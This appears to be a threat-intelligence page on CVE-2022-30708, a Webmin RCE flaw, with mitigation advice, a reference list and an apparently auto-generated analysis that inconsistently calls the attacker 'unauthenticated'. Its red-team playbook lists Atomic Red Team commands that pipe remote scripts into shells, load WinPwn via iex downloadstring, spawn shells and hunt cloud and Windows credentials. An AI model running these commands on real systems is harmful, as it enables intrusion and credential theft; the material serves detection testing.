CVE-2022-30708
Overview
This vulnerability is a remote code execution flaw caused by improper access control in the settings-editor_write.cgi script of Webmin when the Authentic theme is enabled. The root cause is the failure to restrict the 'file' parameter, allowing unauthorized file manipulation. The affected component is the settings-editor_write.cgi endpoint within Webmin versions up to 1.991, specifically when user accounts are manually created outside Virtualmin or Cloudmin.
Vulnerability Description
Webmin through 1.991, when the Authentic theme is used, allows remote code execution when a user has been manually created (i.e., not created in Virtualmin or Cloudmin). This occurs because settings-editor_write.cgi does not properly restrict the file parameter.
Impact
An attacker with a manually created user account can execute arbitrary code on the Webmin server remotely without requiring user interaction. The vulnerability requires low privilege authentication (PR:L) but no user interface interaction (UI:N) and is exploitable over the network without elevated privileges. Successful exploitation can lead to full system compromise, data exposure, or lateral movement within the network, significantly impacting organizational security and service availability.
Solution
Users should upgrade Webmin to a version later than 1.991 where this vulnerability is addressed. The Webmin project has acknowledged the issue in their GitHub repository (https://github.com/webmin/webmin/issues/1635) and released patches that properly restrict the 'file' parameter in settings-editor_write.cgi. Administrators are advised to apply these updates promptly and review user account creation methods to avoid manual user provisioning outside Virtualmin or Cloudmin.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Webmin, particularly when utilizing the Authentic theme, presents a significant risk due to improper handling of user-created accounts. Specifically, the flaw resides in the settings-editor_write.cgi component, which fails to adequately restrict the file parameter. This oversight allows an attacker to manipulate the file input, leading to the potential execution of arbitrary code on the server. The implications of this vulnerability are severe, as it can be exploited by an unauthenticated user who has been manually created within the system, bypassing typical access controls that would otherwise prevent unauthorized actions.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could craft a malicious request that targets the vulnerable CGI script, leveraging the improper file parameter validation to upload and execute malicious scripts on the server. This could be achieved through social engineering tactics to gain access to a user account or by exploiting other weaknesses in the system to create a user with the necessary permissions. Once the attacker gains control, they can execute commands with the privileges of the Webmin process, potentially leading to full system compromise. This scenario underscores the importance of understanding the context in which the vulnerability can be exploited, particularly in environments where users are created manually rather than through more secure automated processes.
The real-world impact of this vulnerability is substantial, particularly for organizations that rely on Webmin for system administration. Given the high CVSS score of 8.8, the risk level is categorized as critical, indicating that successful exploitation could lead to severe consequences, including data breaches, unauthorized access to sensitive information, and potential disruption of services. Businesses that operate in regulated industries may face compliance issues and legal ramifications if sensitive data is exposed or compromised. Furthermore, the reputational damage from a successful attack can have long-lasting effects, eroding customer trust and impacting business relationships.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-layered security approach. Regularly updating Webmin to the latest version is crucial, as patches often address known vulnerabilities. Additionally, organizations should conduct thorough security assessments and penetration testing to identify potential weaknesses in their configurations. Monitoring logs for unusual activity, such as unauthorized file access attempts or unexpected user account creations, can also help in early detection of exploitation attempts. Employing strict access controls and limiting the creation of user accounts to trusted administrative personnel can further reduce the attack surface.
In conclusion, the vulnerability within Webmin's settings-editor_write.cgi component represents a critical security risk that can lead to remote code execution under specific conditions. Understanding the technical details, potential attack vectors, and real-world implications is essential for organizations to safeguard their systems. By adopting proactive detection and mitigation strategies, businesses can significantly reduce their exposure to this vulnerability and enhance their overall cybersecurity posture.
CSURFACE threat intelligence has identified a moderate increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2022-30708, reflecting a growing likelihood of exploitation attempts targeting the Webmin vulnerability. Although no new exploit techniques or proof-of-concept codes have emerged, the upward trend in EPSS suggests heightened attacker interest or improved exploit reliability in the wild. This incremental rise, now placing the vulnerability near the upper decile of EPSS percentiles, signals that threat actors may be prioritizing this vector as part of broader campaigns, potentially leveraging manual user account configurations to bypass existing controls. For defenders, this shift underscores the importance of maintaining vigilance around Webmin deployments, especially those using the Authentic theme with manually created users, as the risk of remote code execution exploitation is becoming more imminent. Consequently, the threat level associated with CVE-2022-30708 should be considered elevated within operational environments where the vulnerable configuration exists, warranting increased monitoring and readiness despite the absence of newly disclosed exploits.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Webmin | Webmin | All |
cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (9)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-30708 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/webmin/webmin/issues/1635 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/esp0xdeadbeef/rce_webmin |
| twitch.tv |
GitHub CVE
x_refsource_MISC
|
https://www.twitch.tv/videos/1483029790 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/webmin/webmin/releases |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/webmin/authentic-theme/releases |
| webmin.com |
GitHub CVE
x_refsource_MISC
|
https://webmin.com/changes.html |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/webmin/webmin/commit/6a2334bf8b27d55c7edf0b2825cd14f3f8a69d4d |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/esp0xdeadbeef/rce_webmin/blob/main/exploit.py |